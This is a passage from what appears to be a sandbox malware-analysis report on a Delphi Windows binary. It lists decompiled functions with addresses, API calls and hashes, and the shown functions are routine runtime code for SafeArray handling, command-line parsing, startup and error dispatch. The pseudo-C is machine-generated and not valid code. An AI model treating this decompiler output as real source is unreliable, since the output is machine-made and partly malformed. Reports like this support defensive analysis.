							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                                                                                                                                                                                          0x00410b94
                                                                                                                                                                                          0x00410ba0
                                                                                                                                                                                          0x00410ba6
                                                                                                                                                                                          0x00410ba8
                                                                                                                                                                                          0x00410bb2
                                                                                                                                                                                          0x00410bb9
                                                                                                                                                                                          0x00410bb9
                                                                                                                                                                                          0x00410bbe
                                                                                                                                                                                          0x00410bcc
                                                                                                                                                                                          0x00410d45
                                                                                                                                                                                          0x00410d4c
                                                                                                                                                                                          0x00410d4d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410bd2
                                                                                                                                                                                          0x00410bd5
                                                                                                                                                                                          0x00410be7
                                                                                                                                                                                          0x00410bd7
                                                                                                                                                                                          0x00410bdc
                                                                                                                                                                                          0x00410bdc
                                                                                                                                                                                          0x00410bf6
                                                                                                                                                                                          0x00410c02
                                                                                                                                                                                          0x00410c05
                                                                                                                                                                                          0x00410c72
                                                                                                                                                                                          0x00410c78
                                                                                                                                                                                          0x00410c79
                                                                                                                                                                                          0x00410c7f
                                                                                                                                                                                          0x00410c80
                                                                                                                                                                                          0x00410c82
                                                                                                                                                                                          0x00410c87
                                                                                                                                                                                          0x00410c8b
                                                                                                                                                                                          0x00410c8d
                                                                                                                                                                                          0x00410c8d
                                                                                                                                                                                          0x00410c98
                                                                                                                                                                                          0x00410ca3
                                                                                                                                                                                          0x00410cae
                                                                                                                                                                                          0x00410cb7
                                                                                                                                                                                          0x00410cba
                                                                                                                                                                                          0x00410cd6
                                                                                                                                                                                          0x00410cdd
                                                                                                                                                                                          0x00410ce8
                                                                                                                                                                                          0x00410cff
                                                                                                                                                                                          0x00410d04
                                                                                                                                                                                          0x00410d18
                                                                                                                                                                                          0x00410d1d
                                                                                                                                                                                          0x00410d30
                                                                                                                                                                                          0x00410d30
                                                                                                                                                                                          0x00410d39
                                                                                                                                                                                          0x00410cbc
                                                                                                                                                                                          0x00410cbc
                                                                                                                                                                                          0x00410cbd
                                                                                                                                                                                          0x00410cc3
                                                                                                                                                                                          0x00410cc9
                                                                                                                                                                                          0x00410ccb
                                                                                                                                                                                          0x00410ccd
                                                                                                                                                                                          0x00410cd0
                                                                                                                                                                                          0x00410cd3
                                                                                                                                                                                          0x00410cd3
                                                                                                                                                                                          0x00410cd6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410cd6
                                                                                                                                                                                          0x00410c07
                                                                                                                                                                                          0x00410c07
                                                                                                                                                                                          0x00410c08
                                                                                                                                                                                          0x00410c0a
                                                                                                                                                                                          0x00410c10
                                                                                                                                                                                          0x00410c12
                                                                                                                                                                                          0x00410c21
                                                                                                                                                                                          0x00410c22
                                                                                                                                                                                          0x00410c2c
                                                                                                                                                                                          0x00410c2d
                                                                                                                                                                                          0x00410c32
                                                                                                                                                                                          0x00410c3d
                                                                                                                                                                                          0x00410c3e
                                                                                                                                                                                          0x00410c48
                                                                                                                                                                                          0x00410c49
                                                                                                                                                                                          0x00410c4e
                                                                                                                                                                                          0x00410c69
                                                                                                                                                                                          0x00410c6b
                                                                                                                                                                                          0x00410c6c
                                                                                                                                                                                          0x00410c6f
                                                                                                                                                                                          0x00410c6f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410c10
                                                                                                                                                                                          0x00410c05

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410C2D
                                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410C49
                                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00410C82
                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410CFF
                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410D18
                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 00410D4D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 351091851-0
                                                                                                                                                                                          • Opcode ID: 1a0c5e6c050001794f1ff5e31b2fcf348b0556ab8ee720e0f9262f1449dc0c54
                                                                                                                                                                                          • Instruction ID: 003888812708ca8383a4c1960096dd24bca7936a94d77342cebcc1c5295c8c4e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a0c5e6c050001794f1ff5e31b2fcf348b0556ab8ee720e0f9262f1449dc0c54
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7551FE7590121D9FCB66DB59C981BD9B3BCAF4C304F4041EAE508E7202D678AFC58FA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041CE2C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                          			E0041CE2C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				void* _t36;
				void* _t49;
				CHAR* _t50;
				void* _t60;
				void* _t71;
				char _t72;
				char _t73;
				intOrPtr _t88;
				CHAR* _t91;
				CHAR** _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;

				_t96 = _t97;
				_t98 = _t97 + 0xfffffff4;
				_v16 = 0;
				_t71 = __edx;
				_v8 = __eax;
				_t94 =  &_v12;
				 *[fs:eax] = _t98;
				E0041BEF0(_v8);
				 *[fs:eax] = _t98;
				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0x41cf5e, _t96,  *[fs:eax], 0x41cf7b, _t96, __edi, __esi, __ebx, _t95);
				 *_t94 = E00404E80(_t71);
				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
					 *_t94 = CharNextA( *_t94);
				}
				while(1) {
					_t72 =  *( *_t94);
					if(_t72 == 0) {
						break;
					}
					_t36 = E0041CFA4(_v8);
					__eflags = _t72 - _t36;
					if(_t72 != _t36) {
						_t91 =  *_t94;
						while(1) {
							_t73 =  *( *_t94);
							__eflags = _t73 - 0x20;
							if(_t73 <= 0x20) {
								break;
							}
							_t60 = E0041CF8C(_v8);
							__eflags = _t73 - _t60;
							if(_t73 != _t60) {
								 *_t94 = CharNextA( *_t94);
								continue;
							}
							break;
						}
						__eflags =  *_t94 - _t91;
						E00404AB0( &_v16,  *_t94 - _t91, _t91,  *_t94 - _t91);
					} else {
						E004091D4(_t94,  &_v16, E0041CFA4(_v8));
					}
					 *((intOrPtr*)( *_v8 + 0x38))();
					while(1) {
						__eflags =  *( *_t94) - 0xffffffffffffffe1;
						if( *( *_t94) - 0xffffffffffffffe1 >= 0) {
							break;
						}
						 *_t94 = CharNextA( *_t94);
					}
					_t49 = E0041CF8C(_v8);
					__eflags = _t49 -  *( *_t94);
					if(_t49 ==  *( *_t94)) {
						_t50 = CharNextA( *_t94);
						__eflags =  *_t50;
						if( *_t50 == 0) {
							__eflags = 0;
							 *((intOrPtr*)( *_v8 + 0x38))();
						}
						do {
							 *_t94 = CharNextA( *_t94);
							__eflags =  *( *_t94) - 0xffffffffffffffe1;
						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
					}
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E0041CF65);
				return E0041BFAC(_v8);
			}




















                                                                                                                                                                                          0x0041ce2d
                                                                                                                                                                                          0x0041ce2f
                                                                                                                                                                                          0x0041ce37
                                                                                                                                                                                          0x0041ce3a
                                                                                                                                                                                          0x0041ce3c
                                                                                                                                                                                          0x0041ce3f
                                                                                                                                                                                          0x0041ce4d
                                                                                                                                                                                          0x0041ce53
                                                                                                                                                                                          0x0041ce63
                                                                                                                                                                                          0x0041ce6b
                                                                                                                                                                                          0x0041ce75
                                                                                                                                                                                          0x0041ce83
                                                                                                                                                                                          0x0041ce81
                                                                                                                                                                                          0x0041ce81
                                                                                                                                                                                          0x0041cf3c
                                                                                                                                                                                          0x0041cf3e
                                                                                                                                                                                          0x0041cf42
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041ce94
                                                                                                                                                                                          0x0041ce99
                                                                                                                                                                                          0x0041ce9b
                                                                                                                                                                                          0x0041ceb3
                                                                                                                                                                                          0x0041cec1
                                                                                                                                                                                          0x0041cec3
                                                                                                                                                                                          0x0041cec5
                                                                                                                                                                                          0x0041cec8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041cecd
                                                                                                                                                                                          0x0041ced2
                                                                                                                                                                                          0x0041ced4
                                                                                                                                                                                          0x0041cebf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041cebf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041ced4
                                                                                                                                                                                          0x0041ced8
                                                                                                                                                                                          0x0041cedf
                                                                                                                                                                                          0x0041ce9d
                                                                                                                                                                                          0x0041ceac
                                                                                                                                                                                          0x0041ceac
                                                                                                                                                                                          0x0041ceec
                                                                                                                                                                                          0x0041cefb
                                                                                                                                                                                          0x0041cf00
                                                                                                                                                                                          0x0041cf02
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041cef9
                                                                                                                                                                                          0x0041cef9
                                                                                                                                                                                          0x0041cf07
                                                                                                                                                                                          0x0041cf0e
                                                                                                                                                                                          0x0041cf10
                                                                                                                                                                                          0x0041cf15
                                                                                                                                                                                          0x0041cf1a
                                                                                                                                                                                          0x0041cf1d
                                                                                                                                                                                          0x0041cf1f
                                                                                                                                                                                          0x0041cf26
                                                                                                                                                                                          0x0041cf26
                                                                                                                                                                                          0x0041cf29
                                                                                                                                                                                          0x0041cf31
                                                                                                                                                                                          0x0041cf38
                                                                                                                                                                                          0x0041cf38
                                                                                                                                                                                          0x0041cf29
                                                                                                                                                                                          0x0041cf10
                                                                                                                                                                                          0x0041cf4a
                                                                                                                                                                                          0x0041cf4d
                                                                                                                                                                                          0x0041cf50
                                                                                                                                                                                          0x0041cf5d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CE7C
                                                                                                                                                                                          • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CEF4
                                                                                                                                                                                          • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CF15
                                                                                                                                                                                          • CharNextA.USER32(00000000,?,?,00000000,0041CF7B), ref: 0041CF2C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3213498283-3916222277
                                                                                                                                                                                          • Opcode ID: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                                                                                                                                                          • Instruction ID: 11efbd69cb5f73df2cbcf5fefe28e22a1c1bddc5dbaf51a38cd0fed122abd7e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: A1415130A44244DFCB11DF79C991999BBF6EF5A30472404AAF4C1D7392C738AD82DB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406B91 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00406B91(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x49e5bc)) =  *((intOrPtr*)(__eax - 0x49e5bc)) + __eax - 0x49e5bc;
				 *0x49b00c = 2;
				 *0x49e014 = 0x40124c;
				 *0x49e018 = 0x40125c;
				 *0x49e04e = 2;
				 *0x49e000 = E00405998;
				if(E00403A2C() != 0) {
					_t3 = E00403A5C();
				}
				E00403B20(_t3);
				 *0x49e054 = 0xd7b0;
				 *0x49e220 = 0xd7b0;
				 *0x49e3ec = 0xd7b0;
				 *0x49e040 = GetCommandLineA();
				 *0x49e03c = E004013AC();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x49e5c0 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x49e034 = _t11;
				return _t11;
			}





                                                                                                                                                                                          0x00406b91
                                                                                                                                                                                          0x00406b96
                                                                                                                                                                                          0x00406b9b
                                                                                                                                                                                          0x00406b9d
                                                                                                                                                                                          0x00406ba4
                                                                                                                                                                                          0x00406bae
                                                                                                                                                                                          0x00406bb8
                                                                                                                                                                                          0x00406bbf
                                                                                                                                                                                          0x00406bd0
                                                                                                                                                                                          0x00406bd2
                                                                                                                                                                                          0x00406bd2
                                                                                                                                                                                          0x00406bd7
                                                                                                                                                                                          0x00406bdc
                                                                                                                                                                                          0x00406be5
                                                                                                                                                                                          0x00406bee
                                                                                                                                                                                          0x00406bfc
                                                                                                                                                                                          0x00406c06
                                                                                                                                                                                          0x00406c1a
                                                                                                                                                                                          0x00406c53
                                                                                                                                                                                          0x00406c1c
                                                                                                                                                                                          0x00406c2a
                                                                                                                                                                                          0x00406c42
                                                                                                                                                                                          0x00406c2c
                                                                                                                                                                                          0x00406c2c
                                                                                                                                                                                          0x00406c2c
                                                                                                                                                                                          0x00406c2a
                                                                                                                                                                                          0x00406c58
                                                                                                                                                                                          0x00406c5d
                                                                                                                                                                                          0x00406c62

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000000), ref: 00403A31
                                                                                                                                                                                            • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000001), ref: 00403A3D
                                                                                                                                                                                          • GetCommandLineA.KERNEL32 ref: 00406BF7
                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 00406C0B
                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 00406C1C
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00406C58
                                                                                                                                                                                            • Part of subcall function 00403A5C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                                                                                                                                                            • Part of subcall function 00403A5C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                                                                                                                                                            • Part of subcall function 00403A5C: RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                                                                                                                                                          • GetThreadLocale.KERNEL32 ref: 00406C38
                                                                                                                                                                                            • Part of subcall function 00406AC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3734044017-0
                                                                                                                                                                                          • Opcode ID: 9295353b5bb928d64e273907c322e146d769a3d40c097fb37944f0b3d52c111f
                                                                                                                                                                                          • Instruction ID: fdcee0d7d708edd62114d02ed336596d20e14c9a9bb73fcb5a3f4b26375a27c1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9295353b5bb928d64e273907c322e146d769a3d40c097fb37944f0b3d52c111f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 52016DB4414351CAE710FFA7A8063583AA0AB2131DF05583FD541BA2F2FBBC01158B6E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004103E4 Relevance: 8.9, Strings: 7, Instructions: 152COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E004103E4(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t33;
				intOrPtr _t34;
				void* _t43;
				intOrPtr _t44;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t54;
				intOrPtr* _t58;
				intOrPtr _t64;
				intOrPtr _t68;
				void* _t72;
				intOrPtr _t73;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t86;
				void* _t92;
				intOrPtr _t106;
				void* _t126;
				void* _t127;
				intOrPtr _t129;
				intOrPtr _t130;
				void* _t132;
				void* _t133;

				_t127 = __esi;
				_t126 = __edi;
				_t129 = _t130;
				_t92 = 8;
				do {
					_push(0);
					_push(0);
					_t92 = _t92 - 1;
				} while (_t92 != 0);
				_t91 = __eax;
				_push(_t129);
				_push(0x410629);
				_push( *[fs:eax]);
				 *[fs:eax] = _t130;
				_t132 = __eax - 0x8002000a;
				if(_t132 > 0) {
					_t33 = __eax - 0x8002000b;
					if(_t33 == 0) {
						_t34 =  *0x49dc98; // 0x407dec
						E00406A70(_t34,  &_v16);
						E0040D144(_v16, 1);
						E00404378();
					} else {
						_t43 = _t33 - 2;
						if(_t43 == 0) {
							_t44 =  *0x49de18; // 0x407df4
							E00406A70(_t44,  &_v20);
							E0040D144(_v20, 1);
							E00404378();
						} else {
							_t48 = _t43 - 0x50001;
							if(_t48 == 0) {
								_t49 =  *0x49d870; // 0x407cec
								E00406A70(_t49,  &_v28);
								E0040D144(_v28, 1);
								E00404378();
							} else {
								if(_t48 == 0x49) {
									_t54 =  *0x49d8a0; // 0x407e34
									E00406A70(_t54,  &_v32);
									E0040D144(_v32, 1);
									E00404378();
								} else {
									goto L27;
								}
							}
						}
					}
				} else {
					if(_t132 == 0) {
						_t68 =  *0x49d7b8; // 0x407e2c
						E00406A70(_t68,  &_v12);
						E0040D144(_v12, 1);
						E00404378();
					} else {
						_t133 = __eax - 0x80020005;
						if(_t133 > 0) {
							_t72 = __eax - 0x80020008;
							if(_t72 == 0) {
								_t73 =  *0x49dd68; // 0x407e3c
								E00406A70(_t73,  &_v8);
								E0040D144(_v8, 1);
								E00404378();
							} else {
								if(_t72 == 1) {
									E0041024C(_t92);
								} else {
									goto L27;
								}
							}
						} else {
							if(_t133 == 0) {
								E0041015C(__eax, _t92);
							} else {
								_t80 = __eax - 0x80004001;
								if(_t80 == 0) {
									_t81 =  *0x49db44; // 0x407e44
									E00406A70(_t81,  &_v24);
									E0040D144(_v24, 1);
									E00404378();
								} else {
									if(_t80 == 0xbffe) {
										_t86 =  *0x49d7b4; // 0x407e4c
										E00406A70(_t86,  &_v36);
										E0040D144(_v36, 1);
										E00404378();
									} else {
										L27:
										_t58 =  *0x49dd7c; // 0x49b154
										_v60 =  *_t58;
										_v56 = 0xb;
										_v52 = _t91;
										_v48 = 0;
										E0040C918(_t91,  &_v64);
										_v44 = _v64;
										_v40 = 0xb;
										_t64 =  *0x49da04; // 0x407e14
										E00406A70(_t64,  &_v68);
										E0040D180(_t91, _v68, 1, _t126, _t127, 2,  &_v60);
										E00404378();
									}
								}
							}
						}
					}
				}
				_pop(_t106);
				 *[fs:eax] = _t106;
				_push(E00410630);
				E004049E4( &_v68, 2);
				return E004049E4( &_v36, 8);
			}










































                                                                                                                                                                                          0x004103e4
                                                                                                                                                                                          0x004103e4
                                                                                                                                                                                          0x004103e5
                                                                                                                                                                                          0x004103e7
                                                                                                                                                                                          0x004103ec
                                                                                                                                                                                          0x004103ec
                                                                                                                                                                                          0x004103ee
                                                                                                                                                                                          0x004103f0
                                                                                                                                                                                          0x004103f0
                                                                                                                                                                                          0x004103f4
                                                                                                                                                                                          0x004103f8
                                                                                                                                                                                          0x004103f9
                                                                                                                                                                                          0x004103fe
                                                                                                                                                                                          0x00410401
                                                                                                                                                                                          0x00410406
                                                                                                                                                                                          0x0041040b
                                                                                                                                                                                          0x00410446
                                                                                                                                                                                          0x0041044b
                                                                                                                                                                                          0x004104d6
                                                                                                                                                                                          0x004104db
                                                                                                                                                                                          0x004104ea
                                                                                                                                                                                          0x004104ef
                                                                                                                                                                                          0x00410451
                                                                                                                                                                                          0x00410451
                                                                                                                                                                                          0x00410454
                                                                                                                                                                                          0x004104fc
                                                                                                                                                                                          0x00410501
                                                                                                                                                                                          0x00410510
                                                                                                                                                                                          0x00410515
                                                                                                                                                                                          0x0041045a
                                                                                                                                                                                          0x0041045a
                                                                                                                                                                                          0x0041045f
                                                                                                                                                                                          0x00410548
                                                                                                                                                                                          0x0041054d
                                                                                                                                                                                          0x0041055c
                                                                                                                                                                                          0x00410561
                                                                                                                                                                                          0x00410465
                                                                                                                                                                                          0x00410468
                                                                                                                                                                                          0x0041056e
                                                                                                                                                                                          0x00410573
                                                                                                                                                                                          0x00410582
                                                                                                                                                                                          0x00410587
                                                                                                                                                                                          0x0041046e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041046e
                                                                                                                                                                                          0x00410468
                                                                                                                                                                                          0x0041045f
                                                                                                                                                                                          0x00410454
                                                                                                                                                                                          0x0041040d
                                                                                                                                                                                          0x0041040d
                                                                                                                                                                                          0x004104b0
                                                                                                                                                                                          0x004104b5
                                                                                                                                                                                          0x004104c4
                                                                                                                                                                                          0x004104c9
                                                                                                                                                                                          0x00410413
                                                                                                                                                                                          0x00410413
                                                                                                                                                                                          0x00410418
                                                                                                                                                                                          0x00410437
                                                                                                                                                                                          0x0041043c
                                                                                                                                                                                          0x00410480
                                                                                                                                                                                          0x00410485
                                                                                                                                                                                          0x00410494
                                                                                                                                                                                          0x00410499
                                                                                                                                                                                          0x0041043e
                                                                                                                                                                                          0x0041043f
                                                                                                                                                                                          0x004104a3
                                                                                                                                                                                          0x00410441
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410441
                                                                                                                                                                                          0x0041043f
                                                                                                                                                                                          0x0041041a
                                                                                                                                                                                          0x0041041a
                                                                                                                                                                                          0x00410473
                                                                                                                                                                                          0x0041041c
                                                                                                                                                                                          0x0041041c
                                                                                                                                                                                          0x00410421
                                                                                                                                                                                          0x00410522
                                                                                                                                                                                          0x00410527
                                                                                                                                                                                          0x00410536
                                                                                                                                                                                          0x0041053b
                                                                                                                                                                                          0x00410427
                                                                                                                                                                                          0x0041042c
                                                                                                                                                                                          0x00410591
                                                                                                                                                                                          0x00410596
                                                                                                                                                                                          0x004105a5
                                                                                                                                                                                          0x004105aa
                                                                                                                                                                                          0x00410432
                                                                                                                                                                                          0x004105b1
                                                                                                                                                                                          0x004105b1
                                                                                                                                                                                          0x004105b8
                                                                                                                                                                                          0x004105bb
                                                                                                                                                                                          0x004105bf
                                                                                                                                                                                          0x004105c2
                                                                                                                                                                                          0x004105cb
                                                                                                                                                                                          0x004105d3
                                                                                                                                                                                          0x004105d6
                                                                                                                                                                                          0x004105e3
                                                                                                                                                                                          0x004105e8
                                                                                                                                                                                          0x004105f7
                                                                                                                                                                                          0x004105fc
                                                                                                                                                                                          0x004105fc
                                                                                                                                                                                          0x0041042c
                                                                                                                                                                                          0x00410421
                                                                                                                                                                                          0x0041041a
                                                                                                                                                                                          0x00410418
                                                                                                                                                                                          0x0041040d
                                                                                                                                                                                          0x00410603
                                                                                                                                                                                          0x00410606
                                                                                                                                                                                          0x00410609
                                                                                                                                                                                          0x00410616
                                                                                                                                                                                          0x00410628

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: ,~@$4~@$<~@$D~@$L~@$|@$}@
                                                                                                                                                                                          • API String ID: 0-2248249760
                                                                                                                                                                                          • Opcode ID: 0fd9de8a613a83488fa10c527112fbc6f580c9f86778eadd73a5def4586ebc8a
                                                                                                                                                                                          • Instruction ID: 221938c4fecbed69054d06f7700d32dfb38bd6509754f1f9a270053b60a70c2e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fd9de8a613a83488fa10c527112fbc6f580c9f86778eadd73a5def4586ebc8a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43515174A00205CBC714FBA9D896ADD73B1AB84308F50413BE901BB3A1CBB96DD4CA5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403A5C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00403A5C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x49b024 & 0x0000ffff;
